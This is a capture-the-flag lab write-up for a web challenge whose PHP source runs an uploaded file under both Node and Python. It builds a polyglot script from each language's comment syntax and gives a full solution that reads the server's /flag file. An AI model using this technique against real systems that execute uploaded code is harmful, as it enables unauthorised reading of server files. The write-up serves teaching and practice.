Simple Welcome - 0x04(Lab - Script)


tags: CTF Web eductf

Challenge: https://pyscript.ctf.zoolab.org/

Source Code

<?php
    if(!isset($_FILES["file"]))
        highlight_file(__file__) && die();
    $flag = file_get_contents('/flag');
    $node = @`node {$_FILES["file"]["tmp_name"]} 2>&1`;
    $python = @`python3 {$_FILES["file"]["tmp_name"]} 2>&1`;
    if($flag === $node && $flag === $python)
        echo 'Here is your Flag: '.$flag;
    else
        echo 'Fail :(';
?>

Analysis

We must write a single script that runs under both python3 and node, and whose output in each case is identical to the flag.

Exploit - Using comment

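  1. In Python, # starts a single-line comment and ''' delimits a multi-line one (strictly a triple-quoted string, used here as a comment).
  2. In Node, // starts a single-line comment and /* */ delimits a multi-line one.
  3. Use the different comment definitions to write the script. Some tips:
     a = 1 // 1;
     b = ''''''

    Both of these instructions are valid in Python: there, // is floor division, while in Node it starts a comment.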

  4. Whole payload
    • Python
      ```python!
      a = 1 // 1 ; b = '''

      console.log('Javascript code here');

      /* '''

      print('Python code here')

      # */
      ```
    • Javascript
      ```javascript!
      a = 1 // 1 ; b = '''

      console.log('Javascript code here');

      /* '''

      print('Python code here')

      # */
      ```
    
  • Whole exploit
      a = 1 // 1 ; b = '''
    
      const fs = require('fs');
    
      fs.readFile("/flag", 'utf8',(error, data) => {
          if (error) {
              console.error(error);
              return;
          }
          console.log(data.split('\n')[0]);
      })
    
      /* '''
    
      f = open("/flag", "r")
      print(f.read().split('\n')[0])
      # */
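
To see why the placeholder payload from step 4 runs under both interpreters, the added example below (not part of the original writeup) parses it with CPython's own `ast` module and with a simplified JavaScript comment stripper. The names `python_view`, `python_strings`, `js_view` and the regex lexer are assumptions of this example; the lexer ignores regex and template literals.

```python
import ast
import re

# The page's placeholder polyglot, reproduced verbatim.
POLYGLOT = """a = 1 // 1 ; b = '''

console.log('Javascript code here');

/* '''

print('Python code here')

# */
"""

# Simplified JavaScript lexer (an assumption of this example): it knows only
# quoted strings, // comments and /* */ comments, not regex or template literals.
JS_TOKEN = re.compile(
    r"""('(?:\\.|[^'\\\n])*'|"(?:\\.|[^"\\\n])*")"""  # group 1: string, kept
    r"""|//[^\n]*|/\*.*?\*/""",                        # comments, dropped
    re.S,
)


def python_view(src):
    """Top-level statements as CPython's own parser sees them."""
    return [(type(n).__name__, type(getattr(n, "value", None)).__name__)
            for n in ast.parse(src).body]


def python_strings(src):
    """String literals in the Python parse; foreign code hides in these."""
    return [n.value for n in ast.walk(ast.parse(src))
            if isinstance(n, ast.Constant) and isinstance(n.value, str)]


def js_view(src):
    """Lines left for Node once comments are stripped (approximation)."""
    kept = JS_TOKEN.sub(lambda m: m.group(1) or "", src)
    return [line.strip() for line in kept.splitlines() if line.strip()]


if __name__ == "__main__":
    print("python statements:", python_view(POLYGLOT))
    print("python strings   :", python_strings(POLYGLOT))
    print("node lines       :", js_view(POLYGLOT))
```

Python sees two assignments and one `print` call, with the JavaScript swallowed by the string assigned to `b`; Node sees `a = 1` and the `console.log` call, with the Python inside a block comment.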
    
